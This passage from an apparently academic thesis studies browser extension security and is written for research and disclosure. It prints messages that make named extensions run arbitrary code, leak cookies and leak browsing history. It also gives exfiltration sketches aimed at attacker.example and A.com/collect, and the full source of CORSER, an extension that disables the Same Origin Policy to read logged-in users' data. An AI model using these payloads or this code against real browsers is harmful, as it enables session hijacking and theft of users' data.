  val: [URL, CODE, "LoginAPI"]
}
Listing 8.3 – Executing code in the context of a chosen tab thanks to the iwassa extension present on Chrome and Opera. URL is the URL of the page to open in a new tab, and CODE the code to be executed.
The extension also has the host permission, allowing it to make AJAX requests to any domain.
Execute code in background page context Background pages are the most privileged contexts, as they have access to all the capabilities of an extension. Listing 8.4 shows the message to send to the Ringostat dialer [123] Chrome extension to execute arbitrary code in the context of its background page. Interestingly, this extension has the host, storage, cookies and tabs permissions, giving an attacker the ability to bypass SOP, store data in the extension storage, and manage user cookies and tabs (open new tabs, close some, etc.). Messages are to be sent from webpages whose URLs match *://app.ringostat.com/*.
{
  message: "execCommand",
  data: {
    command: "eval",
    params: CODE
  }
}
Listing 8.4 – Message to send to Ringostat dialer background page to execute
arbitrary code. Replace CODE with the real code to be executed.
Bypass SOP Here we take the example of the Buxenger extension, available both on Chrome and Firefox. Listing 8.5 shows the structure of the messages to send to the extension in order to make AJAX requests to any domain (SOP bypass). The case shown here is for HTTP GET requests, but the extension also allows AJAX requests using the HTTP POST, DELETE and PATCH methods.
{
  message: "ajax-get",
  url: URL,
  callbackId: ID
}
Listing 8.5 – Make arbitrary AJAX requests thanks to the Buxenger extension present
on Chrome and Firefox. Replace URL with the URL of the data to access, and ID with
any value.
Retrieve cookies Listing 8.6 shows the case of the eRail.in Chrome extension which
allows any webpage to retrieve the list of user cookies.
{ Action: " G ET C OO KI E " }
Listing 8.6 – Message to send to the erail.in extension in order to retrieve all user cookies
This includes any cookie, such as the user's authentication cookies set after she has logged into web applications. One can further use the cookies to mount session hijacking attacks. The extension also allows making arbitrary AJAX requests, by sending messages as shown in Listing 8.7.
{
  Action: "GET_BLOB",
  URL: URL
}
Listing 8.7 – Making AJAX requests thanks to the eRail.in Chrome extension
Downloads files Listing 8.8 shows the signature of the messages to send from any webpage to the HTTP Commander [72] Chrome extension in order to trigger the download of any file. Replace FILE_URL with the URL of the file to download, and FILE_NAME with the name under which the file will be saved on the user's device. Multiple files can be sent in the message; they will all be downloaded one after the other.
{
  type: "HTCOMNET_DOWNLOAD",
  files: [{
    url: FILE_URL,
    path: FILE_NAME
  }]
}
Listing 8.8 – Download files on the user device, thanks to the HTTP Commander
extension.
Store data in extension storage Listing 8.9 shows the messages to send in order to store and retrieve data in the storage of the VisualSP Training for Office 365 [151] Chrome extension. Replace DATA_TO_STORE with the data to be stored. Later on, send the second message to retrieve the data; it will be delivered to the iframes in the page. To collect data previously stored in the extension storage, one can therefore add an iframe to the webpage, send the retrieval message, collect the data from the iframe, and send it back to the parent page (a sketch of this workflow is given after Listing 8.9).
// Store data
{
  owner: "VisualSP",
  command: "SetUserId",
  data: DATA_TO_STORE
}
// Retrieve data.
{
  owner: "VisualSP",
  command: "GetUserId"
}
Listing 8.9 – Store and retrieve data in VisualSP Training for Office 365 Chrome
extension storage
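The sketch below illustrates this retrieval workflow; the collector page URL and the exact way the relayed data reaches the iframe are assumptions made for illustration, while the message shapes come from Listing 8.9.

// Sketch of the retrieval workflow (message shapes from Listing 8.9;
// the collector page is hypothetical).
var frame = document.createElement("iframe");
frame.src = "https://attacker.example/collector.html"; // hypothetical collector page
document.body.appendChild(frame);
frame.onload = function () {
  // Ask the extension to deliver the previously stored data to the page's iframes.
  window.postMessage({ owner: "VisualSP", command: "GetUserId" }, "*");
};
// Inside collector.html, relay whatever the iframe receives back to its parent:
//   window.addEventListener("message", function (e) {
//     window.parent.postMessage(e.data, "*");
//   });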
History, bookmarks, extensions list We show here the case of the Space Galaxy HD Wallpapers extension [131]. It is one of the 31 HD wallpaper extensions from fliptab.io (see Table A.1 in the Appendix) that let pages matching *.fliptab.io manage the user's history, bookmarks, extensions list and storage. Listing 8.10 shows the different messages that have to be sent to get the related information.
// Message for retrieving user browsing history
{
  type: "history",
  act: "get_all"
}
// Message for retrieving bookmarks
{
  type: "bookmarks",
  act: "get_all"
}
// Message for retrieving the list of extensions
{
  type: "extensions",
  act: "get_all"
}
Listing 8.10 – The Space Galaxy HD Wallpapers Chrome extension allows to get user
browsing history, bookmarks and extension list
6.2 Forcing the attack
In order for an attacker to gain access to an extension's APIs, he must have a script loaded in a web application that is allowed to interact with the extension. Moreover, in most cases, that application has to be running in the user's browser for communications to be possible. Figure 8.4 shows a simple scenario in which A.com is an application currently running in a user's browser. This application provides content A.com/content (a script) to another application B.com, which can communicate with an extension to get access to some privileged APIs. However, B.com is not currently running in the user's browser. A.com can force the attack to happen by opening B.com (upon a user interaction with A.com). Once B.com runs, the script it embeds from A.com gets executed and can communicate with the extension to get access to its privileged APIs, for instance to access user data on any other application, and exfiltrate this data to A.com. Given the prevalence of some third-party script providers among web applications [229], this scenario can easily be implemented by attackers to benefit from extensions' capabilities.
Figure 8.4 – A.com forces an attack by opening B.com thereby allowing A.com/content to
load, execute and interact with extensions in order to exfiltrate user data to A.com.
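A minimal sketch of this scenario, with hypothetical domains, endpoints and message shapes, could look as follows:

// On A.com: upon a user interaction, open B.com, which embeds A.com/content.
document.getElementById("open-btn").addEventListener("click", function () {
  window.open("https://B.com/"); // hypothetical page embedding A.com/content
});

// In A.com/content (the script that B.com embeds): talk to the extension and
// exfiltrate its reply back to A.com (message shape and endpoint are hypothetical).
window.addEventListener("message", function (event) {
  if (event.data && event.data.extensionReply) {
    fetch("https://A.com/collect", { method: "POST", body: JSON.stringify(event.data) });
  }
});
window.postMessage({ type: "getData" }, "*");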
Combining multiple extensions Another scenario in which access to an extension's capabilities can be gained indirectly arises when some extensions make it possible to open new tabs and inject and execute arbitrary code in them. We recorded a video showing the use of the LinkClicker extension [87], which allows opening a new tab and executing code in it, together with the Space Galaxy HD Wallpapers extension [131], which allows only fliptab.io to get and delete user browsing history, bookmarks and the extensions list. From any application (localhost in our example), we opened www.fliptab.io and injected code in its context. The code retrieved the list of extensions, the bookmarks and the user's history. This information could then be sent to a server chosen by the attacker. One can even use the LinkClicker extension again to send the retrieved information back to the attacker, by opening a new tab on the attacker's application (localhost in our case). The video is also accessible at https://swexts.000webhostapp.com/extensions/.
7 Discussion
Here we discuss countermeasures to mitigate the security and privacy threats introduced by browser extensions. We are not disclosing the list of extensions until vendors take a definitive decision regarding our findings, nor have we publicly shared the link to the videos demonstrating how we exploited the extensions. Vendors can deactivate vulnerable extensions until they are fixed, and remove them if their developers are not willing to update their code.
7.1 Browser vendors
We are planning to disclose to vendors the extensions posing any of the security and privacy threats reported in this work, and to share our analysis, methodology and tool with them. There is definitely room for further improving the tool; that notwithstanding, as we have shown, the tool in its current state has been able to flag various extensions posing security and privacy threats. We argue that extension review processes should also consider the different security and privacy threats we have identified, in order to help extension developers fix their code before users install their extensions. Moreover, since many browsers now support the same cross-browser WebExtensions API, using a common tool to analyze extensions can help identify similar or identical potentially malicious extensions, and suggest appropriate actions to fix them. Furthermore, we think that browser vendors would gain by sharing information with one another on their extension review processes. For instance, if an extension is flagged as malicious and removed by one vendor, this information may be shared with others so that the same extension can also be removed there. Finally, we suggest that browser vendors require extension developers to provide explanations about the usage of permissions in their extensions. This explanation can be given in the form of a privacy policy, clearly indicated in the manifest.json file, which can be shown to users when they install the extension.
7.2 Web applications developers
To some extent, web application developers can detect SOP bypass, especially when the requests are made by content scripts injected in a third-party web application. By checking the presence and value of the Referer header when requests are received server-side, for instance, one can detect whether an AJAX request originates from a trusted domain, and therefore authorize or reject it. We found that Twitter and Gmail reject (responding with a 403 HTTP status) requests made from content scripts of third-party web applications, especially when the user is logged in. However, we found no way to prevent SOP bypass when extensions allow the attacker to inject code directly in the web application he wants to access. This was the case for almost all the extensions we identified as allowing web applications to execute arbitrary code in their context.
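As an illustration, such a server-side check might look like the sketch below, assuming an Express-style Node.js server; it is not the actual check performed by Twitter or Gmail, and the Referer header may be absent or stripped, so it is only a partial mitigation.

// Sketch: reject sensitive requests whose Referer does not belong to a trusted
// origin (assumes an Express-style Node.js server; endpoint names are illustrative).
const express = require("express");
const app = express();
const TRUSTED_ORIGINS = ["https://example.com"]; // hypothetical trusted origins

app.get("/api/userdata", function (req, res) {
  const referer = req.get("Referer") || "";
  const trusted = TRUSTED_ORIGINS.some(function (origin) {
    return referer.startsWith(origin);
  });
  if (!trusted) {
    return res.status(403).send("Forbidden"); // as observed for Twitter and Gmail
  }
  res.json({ data: "sensitive content" });
});

app.listen(3000);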
7.3 Extensions developers
Most of the issues we have found in extensions are imputable to their developers. The privileged APIs they have access to must be used with care, as they can put the security and privacy of users at serious risk. Most code execution can be avoided by properly sanitizing the messages received from web applications. To avoid leaking user information such as browsing history, extensions can manage such data in extension UI pages instead of relying on webpages and message passing, the reason being that an attacker script may be present on the webpage. It also seems that some of the SOP bypasses are the result of poor programming practices, where extensions allow SOP bypass via message passing for pages from their own domains in order to avoid supporting CORS. Unfortunately, an attacker script may also be present on these pages, and when the extension is poorly programmed, the SOP bypass can inadvertently be enabled for all web applications.
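A minimal sketch of a more defensive content script listener is shown below; the allowed origin and the accepted message type are illustrative.

// Sketch of a defensive content script listener: accept messages only from an
// explicit allow-list of origins and with a fixed, expected structure, and never
// forward attacker-controlled code or URLs to the background page.
var ALLOWED_ORIGINS = ["https://app.example.com"]; // illustrative

window.addEventListener("message", function (event) {
  if (ALLOWED_ORIGINS.indexOf(event.origin) === -1) return; // origin check
  var msg = event.data;
  if (!msg || msg.type !== "getStatus") return;             // strict action whitelist
  chrome.runtime.sendMessage({ type: "getStatus" });        // forward a fixed message only
});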
7.4 Extensions users
Finally, we suggest that users always log out of web applications. This may limit the leakage of cookies and data from applications where the user is logged in. By default, extensions are not allowed in incognito and other private browsing modes; browsing in such modes, without any extensions enabled, surely protects users from many of the security and privacy threats shown in this work.
8 Conclusion
Web applications and browser extensions can interact with one another by exchanging messages. In this work, we built a static analyzer and applied it to Chrome, Firefox and Opera extensions. We identified a substantial number of extensions that enable web applications to benefit from their privileged capabilities. In particular, some extensions allow web applications to access any other application's data, thereby bypassing the Same Origin Policy security mechanism. Extensions also leaked user credentials (cookies), browsing history, bookmarks and the list of installed extensions to web applications, or allowed them to download arbitrary files onto the user's device or to store data in the extension storage for tracking purposes. We showed how trivially attackers can exploit those threats, and argued that browser vendors should take this into consideration when reviewing extensions. The static analysis tool we used in this work could help detect such extensions, so that they can be fixed or removed from browsers.
Chapter 9
Breaking the Same Origin Policy! On CORS header manipulations by browser extensions
Preamble
This chapter analyzes CORS header manipulations by browser extensions. It is under submission.
1 Introduction
Extensions can intercept and modify HTTP communications, in particular the request and response headers exchanged between web applications running in the user's browser and web servers [28,59]. The User-Agent Switcher for Chrome extension [147], for instance, uses this capability to simulate different browsers by modifying the User-Agent request header. When an extension has the capability to manipulate HTTP communications, it can do so with almost any HTTP request and response header: it can remove headers, change their values, or even add new ones. Nonetheless, as different HTTP headers serve different purposes, tampering with them can have various security implications. The X-Frame-Options header, for instance, is set by web servers in HTTP responses to fight against clickjacking attacks [244]; removing this header therefore enables clickjacking attacks. Similarly, the Content-Security-Policy header is used by web applications to deploy Content Security Policies (CSPs) [272,275] to mitigate content injection attacks such as XSS (Cross-Site Scripting) [41]. Hence, tampering with Content-Security-Policy may enable XSS attacks, as demonstrated by Kapravelos et al. [213] and Hausknecht et al. [200].
In this work, we consider the implications of manipulating Cross-Origin Resource Sharing (CORS) HTTP headers. With their ability to modify HTTP headers, extensions can also modify CORS headers. Intuitively, an extension can change or add the appropriate headers in HTTP requests and responses in order to make unauthorized CORS requests always succeed. Doing so allows any web application to directly access data, including sensitive user data, on any other web application's server, thereby breaking the Same Origin Policy (SOP). Moreover, if extensions do not correctly handle CORS headers, they can break legitimate cross-origin requests even though web servers allow them, thereby breaking the functionality of the web applications the user is interacting with.
We analyzed the WebExtensions API, the cross-browser extension system compatible with major browsers including Chrome, Opera, Firefox and Microsoft Edge [2,25,100,110]. We first wanted to assess whether tampering with CORS headers in an extension is considered a security threat from the perspective of browser vendors. To do so, we developed CORSER, a cross-browser WebExtension. While crafting such an extension takes little effort, it requires a correct understanding of the CORS mechanism. We then decided to publish CORSER on different browsers in order to assess whether browser vendors consider tampering with CORS headers a security threat. From their perspective, CORSER is a benign extension, as it successfully passed the different extension review processes. On Firefox, the extension was made public only a few seconds after we submitted it for review [37]. On Opera, it was published a few minutes after the review process started [38]. Finally, on Chrome, the extension was made public on the same day [36].
We also performed an empirical analysis of extensions in the wild. Among the capabilities or permissions usually requested by extensions is the ability to intercept and manipulate HTTP headers, and thus CORS headers, for any web application. We therefore built a static analyzer that flags suspicious extensions potentially tampering with CORS headers. We then manually vetted those extensions and found dozens of them effectively manipulating CORS headers, mostly to authorize unauthorized CORS requests. More surprisingly, we also found that the CORS mechanism is widely misunderstood among extension developers, as most of the extensions that manipulate CORS headers do so in a way that breaks legitimate CORS requests made by web applications running in the user's browser.
In summary, we make the following contributions:
— With an in-depth understanding of the CORS mechanism, we developed the CORSER extension, which tampers with CORS headers to disable the Same Origin Policy in browsers by authorizing unauthorized cross-origin requests.
— We submitted CORSER for review on different browsers; it successfully passed their extension review processes and was published on Chrome, Firefox and Opera.
— We found that the ability to tamper with CORS headers, and thus break the SOP, is widespread among extensions: on Firefox, Chrome, and Opera, around 10% of all extensions have the appropriate permissions to do so.
— Finally, we statically and manually analyzed extensions' source code. A few of them manipulate HTTP headers in ways that break the SOP in browsers. Moreover, we also found that CORS is widely misunderstood among extension developers: many modifications are not done correctly, causing legitimate CORS requests to fail and thereby breaking the web applications running in the user's browser.
With these findings, we discuss various countermeasures and the implications of HTTP header manipulations by browser extensions. First, from a browser vendor perspective, we argue that the extension review processes [23,56,118] must take into consideration HTTP header manipulations, in particular of security-critical headers such as the CORS headers, Content-Security-Policy and X-Frame-Options. We propose that extensions must explicitly request dedicated permissions to be able to tamper with security-critical headers. This would enable browser vendors to warn users of the underlying security and privacy threats that installing such extensions can introduce. In fact, as tampering with HTTP headers is considered benign from the browser vendors' perspective, installing an extension that disables SOP does not raise any particular warning, despite the fact that such tampering represents a serious security threat that users must be aware of. Our recommendation for users is to use their sensitive web applications in a browser environment where no extensions are installed. From a developer's perspective, we show how to safely manipulate CORS headers. Indeed, such extensions can be useful, for instance for advanced users performing web application testing. In these settings, extension developers can give users more control over the extension, allowing them to define when the extension is activated and which requests it may manipulate, and to disable the extension when it is not in use. Finally, we discuss how web servers can fight against CORS header manipulations done by browser extensions. A web server implementing CORS can detect the kind of CORS header modifications done by most of the extensions we analyzed. Nonetheless, this would imply that all servers implement CORS, which unfortunately breaks the backwards-compatibility of the mechanism: normally, when a web server does not support CORS, it returns no CORS headers, in which case the browser falls back to the default SOP and blocks the cross-origin request.
2 Background
The capability of extensions that is of interest in this work is their ability to intercept and manipulate HTTP communications between webpages and web servers, in particular the HTTP request and response headers.
We specifically consider CORS HTTP headers, whose modification constitutes a serious rollback of one of the foundations of the modern browser security model, namely the Same Origin Policy (SOP) [125]. In its basic form, the SOP prevents cross-origin AJAX requests. CORS is a refinement of the SOP in which control is given entirely to web servers, which decide whether to accept or reject cross-origin AJAX requests. With the ability to manipulate HTTP headers, extensions can simply hijack web servers' control over CORS requests and make cross-origin requests always succeed, thereby removing even the basic SOP protection from browsers and allowing any web application to make cross-origin requests to any other web server to access sensitive user data. As shown in Fig. 9.1, HTTP requests go through browser extensions before reaching web servers, and HTTP responses also go through browser extensions before being handled by the browser.
Figure 9.1 – CORS requests workflow in presence of an extension with the capability to intercept and manipulate HTTP headers (Web Application at http://example.com:8080, Web Browser, Browser Extension, Web Server at http://third.com)
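To recall the mechanism concretely, the sketch below shows a credentialed cross-origin request as issued from a page on http://example.com:8080 and, in comments, the headers a consenting server at http://third.com would have to return; the endpoint is illustrative.

// Cross-origin AJAX request issued by a page on http://example.com:8080.
// The browser automatically attaches:  Origin: http://example.com:8080
fetch("http://third.com/api/data", { credentials: "include" })
  .then(function (response) { return response.text(); })
  .then(console.log);

// The browser exposes the response to the page only if http://third.com replies with:
//   Access-Control-Allow-Origin: http://example.com:8080
//   Access-Control-Allow-Credentials: true
// Without such headers, the browser falls back to the SOP and blocks the read.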
2.1 Threat model
The attacker here is any entity willing to make cross-origin requests in order to access sensitive user data and exfiltrate it to a server under the attacker's control. To do so, the attacker has a script in a web application running in the user's browser. The user has installed an extension that manipulates HTTP headers to allow cross-origin requests, even when they are not authorized by web servers. The extension can be either poorly programmed or intentionally malicious. For instance, an extension that modifies CORS headers could be provided to developers for testing purposes; but if it is not well programmed, any script in the user's browser could benefit from its presence to also make unauthorized CORS requests and access user data. The attacker can also be a malicious entity that has compromised a benign extension, or an extension developer willing to evade the extension review process in order to exfiltrate user data. In fact, even though extensions are not subject to the SOP and can make cross-origin requests to access user data, an extension would not pass the review process if it explicitly made AJAX requests to exfiltrate user data directly from the extension context. As a matter of fact, Opera [118] forbids extensions from making explicit XMLHttpRequests [155] to third parties. However, the extension developer could disable SOP through CORS header modifications, then inject a malicious script into a web application running in the user's browser and make any cross-origin request from that application.
3 CORSER extension
In this section, we first present CORSER, a cross-browser extension that intercepts and manipulates CORS headers in order to authorize unauthorized cross-origin requests. While developing such an extension requires little effort, it nonetheless requires a good understanding of the CORS mechanism [34] and of the APIs available to extensions for manipulating HTTP headers [28,59]. We then demonstrate the security implications of such an extension, as it breaks the Same Origin Policy by allowing an attacker to harvest user data on any web application, especially those the user has logged into. Finally, we show that an extension such as CORSER is considered completely benign by browser vendors, as we published it on Chrome [36], Firefox [37] and Opera [38].
3.1 Permissions to manipulate HTTP headers
To intercept and tamper with all HTTP communications, an extension has to declare the
webRequest and webRequestBlocking permissions, in addition to the host permission for
all HTTP hosts, by specifying the <all_urls> permission for instance.
1   {
2     "manifest_version": 2,
3     "name": "CORSER",
4     "version": "1.0",
5     "background": {
6       "scripts": [
7         "background.js"
8       ]
9     },
10    "permissions": [
11      "<all_urls>",
12      "webRequest",
13      "webRequestBlocking"
14    ]
15  }
Listing 9.1 – Content of the CORSER manifest.json file, with the permissions to
manipulate all HTTP requests
Listing 9.1 shows the full content of the manifest.json file of the CORSER extension. Among other things, it contains the name of the extension, its version, its permissions and the background page scripts. The background page is the main component of an extension: it executes in the background and can make use of all the capabilities the extension declares.
3.2 Background page
To manipulate HTTP headers, one has to register handlers (listeners) for the events triggered by HTTP communications between web pages and web servers. Each HTTP request intercepted by an extension goes through a set of stages with dedicated events that can be listened to in order to take different actions on the HTTP headers [28,59]. The request is assigned a unique identifier that remains the same at the different stages of the request; the response to the request is also assigned the same identifier, which helps link a request to its response. Even in the case of preflighted requests, the two sequential requests and their responses are considered a single request and thus assigned the same identifier.
The code to intercept and manipulate HTTP headers is defined in the background page, declared by the background.js file (Line 7 of Listing 9.1). The whole code of the background page script is shown in Listing 9.2.
1
2   // Cross-browser extension API
3   chrome = chrome != null ? chrome : browser;
4
5   // HTTP requests headers to record
6   var corsRequestHeaders = {
7     "origin": "",
8     "access-control-request-method": "",
9     "access-control-request-headers": ""
10  };
11
12  // HTTP responses headers to modify
13  var corsResponseHeaders = {
14    "access-control-allow-origin": "",
15    "access-control-allow-method": "",
16    "access-control-allow-headers": "",
17    "access-control-allow-credentials": "true"
18  }
19
20  // Global object to keep track of HTTP requests
21  var savedRequestsHeaders = {};
22
23
24  // Intercepting HTTP requests headers
25  chrome.webRequest.onBeforeSendHeaders.addListener(requestListener, {
26    urls: ["<all_urls>"],
27    types: ["xmlhttprequest"]
28  }, ["blocking", "requestHeaders"]);
29
30
31  // Manipulating HTTP request headers
32  var requestListener = function(details) {
33    var lcorsHeaders = {}
34
35    for (let header of details.requestHeaders) {
36      if (header.name.toLowerCase() in corsRequestHeaders) {
37        lcorsHeaders[header.name.toLowerCase()] = header.value;
38      }
39    }
40    if ("origin" in lcorsHeaders) {
41      savedRequestsHeaders[details.requestId] = lcorsHeaders
42    }
43    return {
44      requestHeaders: details.requestHeaders
45    };
46  }
47
48
49  // Intercepting HTTP response headers
50  chrome.webRequest.onHeadersReceived.addListener(responseListener, {
51    urls: ["<all_urls>"],
52    types: ["xmlhttprequest"]
53  }, ["blocking", "responseHeaders"]);
54
55
56
57  // Manipulating HTTP response headers
58  var responseListener = function(details) {
59    if (details.requestId in savedRequestsHeaders) {
60      let newResponseHeaders = []
61      for (let header of details.responseHeaders) {
62        if (!(header.name.toLowerCase() in corsResponseHeaders)) {
63          newResponseHeaders.push(header)
64        }
65      }
66      for (let header in savedRequestsHeaders[details.requestId]) {
67        switch (header) {
68          case "origin":
69            newResponseHeaders.push({
70              name: "Access-Control-Allow-Origin",
71              value: savedRequestsHeaders[details.requestId][header]
72            });
73            break;
74          case "access-control-request-method":
75            newResponseHeaders.push({
76              name: "Access-Control-Allow-Methods",
77              value: savedRequestsHeaders[details.requestId][header]
78            });
79            break;
80          case "access-control-request-headers":
81            newResponseHeaders.push({
82              name: "Access-Control-Allow-Headers",
83              value: savedRequestsHeaders[details.requestId][header]
84            });
85            break;
86          default:
87            break;
88        }
89      }
90      newResponseHeaders.push({
91        name: "Access-Control-Allow-Credentials",
92        value: "true"
93      });
94      details.responseHeaders = newResponseHeaders
95      delete savedRequestsHeaders[details.requestId]
96    }
97    return {
98      responseHeaders: details.responseHeaders
99    }
100 }
Listing 9.2 – Content of the background.js file
The main features of the CORSER extension are the following. The background script starts with the definition
of different objects, in particular the list of CORS request headers that are recorded (Lines 6-10),
and the response headers that will be changed or added to make any CORS request successful
(Lines 13-18). Then it defines a global object savedRequestsHeaders in which intercepted
CORS request headers are saved (Line 21).
Intercepting HTTP requests The handler of the onBeforeSendHeaders event is the
right place to intercept HTTP requests. Lines 25-28 of Listing 9.2 show how to intercept
HTTP requests by registering a listener (or handler) for the onBeforeSendHeaders event.
The extension intercepts the headers (requestHeaders) of all AJAX requests
(type xmlhttprequest) to any URL (<all_urls>). The requestListener argument is the callback function
that will be invoked to manipulate the request headers. Its definition is shown in
Lines 32 to 46. In this function, we simply record the value of any CORS request header
(See Table 2.2) found in the cross-origin request (Lines 36-38). The recorded request
headers are then associated with the unique identifier of the request and saved in the global object
savedRequestsHeaders (Line 41).
Intercepting HTTP responses HTTP response headers can be safely manipulated by
registering a listener for the onHeadersReceived event, as shown in Lines
50-53. Response headers of AJAX requests are provided to the responseListener
callback function, defined in Lines 58-100. If the request was a cross-origin request,
then we had previously saved its CORS request headers. So we use the request identifier
present in the response object to retrieve the CORS request headers previously
saved in the global variable (Line 59). Then, to make the CORS request successful, we
start by removing from the response any CORS header returned by the web server that will be
modified or added (Lines 61-65). Then, for each recorded request header,
we add its dual response header with the appropriate value (See Table 2.2): the
Access-Control-Allow-Origin header is added and assigned the value of the recorded
Origin header (Lines 68-73); the Access-Control-Allow-Methods header is added and
assigned the value of the recorded Access-Control-Request-Method header (Lines 74-79);
the Access-Control-Allow-Headers header is added and assigned the value of the recorded
Access-Control-Request-Headers header (Lines 80-85); finally, in order to authorize CORS requests
with credentials, we add the Access-Control-Allow-Credentials response header and
assign it the value true (Lines 90-93).
After manipulating the response headers, we remove the recorded request headers from the
global object savedRequestsHeaders (Line 95) and return the new response headers (Lines
97-99)¹. These modifications successfully authorize otherwise unauthorized CORS requests.
1. To be more precise, we could have removed the recorded request headers in the handler of the onCompleted event [28, 59].
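For illustration, here is a minimal sketch of that variant (it is not part of the published CORSER code): the entries of the savedRequestsHeaders object from Listing 9.2 are removed once the request completes or fails, using the onCompleted and onErrorOccurred events of the webRequest API.
// Sketch: cleanup of saved CORS request headers outside the response listener
var cleanupListener = function (details) {
  delete savedRequestsHeaders[details.requestId];
};
var cleanupFilter = { urls: ["<all_urls>"], types: ["xmlhttprequest"] };
chrome.webRequest.onCompleted.addListener(cleanupListener, cleanupFilter);
chrome.webRequest.onErrorOccurred.addListener(cleanupListener, cleanupFilter);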
3.3 Deploying and testing CORSER
The code of the CORSER extension is available online at https://github.com/mesolido/corser.
We first deployed the CORSER extension locally (in developer mode) on Chrome,
Firefox, and Opera, and tested it to ensure that it worked as expected. In our demonstration
scenario, we took http://jquery.com as a webpage in which an attacker has injected some
code to make AJAX requests to https://www.google.com.
After installing the extension, we navigated to the homepage of http://jquery.com. We
chose this page for our experiments mostly because it includes the jQuery libraries [85],
which provide convenient APIs for making AJAX requests (i.e. $.get, $.ajax). To
make cross-origin AJAX requests, we used the browser console [17]. The request we
made was $.get("https://www.google.com", console.log). The response to the request was displayed in the browser console [17].
We deactivated the extension and made a simple CORS request. It got blocked because
https://www.google.com does not authorize cross-origin requests from http://jquery.com.
Fig. 9.2 shows the error message displayed in the browser console. One of the reasons
why the request got blocked is that no CORS header was returned; in particular, the
Access-Control-Allow-Origin header was missing.
Figure 9.2 – CORS request blocked with CORSER deactivated
We then activated the extension and made the simple CORS request again. The request
succeeded, as CORSER added the appropriate CORS headers. Fig. 9.3 shows only
the head of the response to the request: it is the HTML response corresponding to the Google
homepage (https://www.google.com).
Figure 9.3 – CORSER allows CORS requests
Finally, we made a cross-origin request with credentials as shown in the following listing.
$.ajax({
  url: "https://www.google.com",
  xhrFields: {
    withCredentials: true
  },
  success: console.log
});
When a user is logged into their Google account, the response from https://www.google.com
contains the user's name and email address. Fig. 9.4 highlights the user's email address
in the response. We have chosen this example for the sake of simplicity. Nonetheless,
we also used CORSER to make successful cross-origin requests in order to access more sensitive
information, such as reading emails from Gmail or Yahoo Mail, reading information from the
user's Twitter account, etc.
Figure 9.4 – CORSER allows CORS requests with credentials
3.4 Publishing CORSER
On the 16th of August, we submitted CORSER for review on Chrome, Firefox and Opera,
following their publishing guidelines [23, 56, 118]. In particular, all browsers require that
extensions do not collect and exfiltrate user data, be self-contained, and perform as
expected. CORSER fully complies with all these requirements.
Despite the clear threats that such an extension poses, none of the browser vendors complained
about it. Firefox was the first to accept the extension: right after it was submitted,
the extension was made public [37]. We were sent an email a few days later asking us to fix a typo
(an extra 's' to remove) in the description of the extension. On Chrome, we had to pay a
$5 fee before publishing the extension; afterwards, the extension was made public [36] the
same day. Finally, on Opera, the review process of the extension started the day following
its submission. A reviewer complained because we did not specify icons in the manifest
of the extension. After updating the manifest with the icons, the extension was published
right away [38]. The extension already has a few users (202 downloads on Opera, 35 on
Firefox and 7 on Chrome, as of the 13th of October 2018).
4 Empirical study on CORS headers manipulations
In this section, we assess CORS header manipulations in the wild, in particular whether
extensions tamper with CORS requests, which modifications they make to CORS requests,
and the threats that this implies.
4.1 Data collection and static analyzer
To do so, we collected Chrome, Firefox and Opera extensions [24, 58, 108]. The collection of
extensions was automated using the SlimerJS browser automation tool [130]. We considered
only extensions with the permissions to manipulate HTTP headers, including CORS headers:
these are the extensions that declare the webRequest and webRequestBlocking permissions
in their manifest.json file. We then applied a static analyzer to the scripts of the extensions'
background pages. The static analyzer was written in Node.js [105], using various modules.
In particular, the Jsdom HTML parser [69] was used to parse the background pages, which are
declared as HTML files in the manifest.json, and to extract their scripts. The
Esprima [204] parser was then used to parse the background page scripts. It produced an
Abstract Syntax Tree (AST) of each script, from which we collected the Literal constructs
(i.e. strings, numbers). When we found at least one CORS header among the literals of a
script, the extension was considered suspicious and flagged for further manual analysis.
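The detection step itself is simple. The following is a minimal sketch of it (the file name background.js is a placeholder for an extracted background script, the AST walk is a hand-written traversal, and the Esprima entry point is parseScript in recent versions of the library):
const fs = require('fs');
const esprima = require('esprima');

const CORS_HEADERS = [
  'access-control-allow-origin', 'access-control-allow-methods',
  'access-control-allow-headers', 'access-control-allow-credentials',
  'access-control-request-method', 'access-control-request-headers'
];

// Recursively walk the ESTree AST and collect string Literal values
function collectLiterals(node, literals) {
  if (node === null || typeof node !== 'object') return;
  if (node.type === 'Literal' && typeof node.value === 'string') {
    literals.push(node.value.toLowerCase());
  }
  for (const key of Object.keys(node)) {
    const child = node[key];
    if (Array.isArray(child)) child.forEach(c => collectLiterals(c, literals));
    else collectLiterals(child, literals);
  }
}

const ast = esprima.parseScript(fs.readFileSync('background.js', 'utf8'));
const literals = [];
collectLiterals(ast, literals);
// Flag the extension as suspicious if any CORS header appears among the literals
if (literals.some(l => CORS_HEADERS.includes(l))) {
  console.log('suspicious: flagged for manual analysis');
}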
Limitations We considered only background scripts that are bundled in extension packages.
In fact, browser vendors recommend that extensions be self-contained: a restrictive default
Content Security Policy (CSP) is applied to extensions, which bans external scripts by
default [31, 32, 118]. However, an extension developer may still relax this default CSP in
order to dynamically load external scripts in background pages. We therefore miss extensions
whose code for manipulating CORS headers might be loaded from an external library. Our
results thus represent a lower bound on the number of extensions that may be tampering
with CORS headers.
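For illustration, relaxing the default CSP only requires one entry in the manifest; the following sketch uses manifest version 2 syntax, and the whitelisted host is a placeholder:
{
  "manifest_version": 2,
  "name": "Example extension",
  "version": "1.0",
  "background": { "page": "background.html" },
  "content_security_policy": "script-src 'self' https://cdn.example.com; object-src 'self'"
}
The background page of such an extension can then load and execute a script hosted on the whitelisted origin, which our static analyzer never sees.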
4.2 Manual analysis
The manual analysis always consisted of first reviewing the code of suspicious extensions
in order to assess whether they manipulated CORS headers, which headers were manipulated
and how, which webpages' CORS requests were intercepted, which URLs were targeted,
and whether a user action was required to activate the extension's ability to manipulate
CORS headers. For the code review, we installed CRX Viewer [277], a convenient extension
for browsing extension bundles directly in the browser. Then, we installed the suspicious
extension in the browser and interacted with it in order to confirm that it effectively
tampered with CORS headers. The interactions consisted in making cross-origin requests to
the different hosts declared in the extension's manifest.json. For more control over
the HTTP communications, we set up our own local web server implementing the CORS
mechanism (a minimal sketch is given below). It enabled us to trigger different behaviors of
suspicious extensions regarding header manipulations. For extensions we could not confirm
just by installing and interacting with them, we downloaded their packages and patched the
background scripts with hooks before reinstalling and debugging the extensions. The hooks
were basically additional lines of code added to the extension code that helped us understand
how the extension works, and which requests had to be made to trigger CORS header manipulations.
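The local test server does not need to be complex. The following sketch (the port, trusted origin and headers are arbitrary test values) implements just enough of the CORS mechanism to trigger simple, preflighted and credentialed requests and to compare the headers actually sent by the server with the ones eventually seen by the page:
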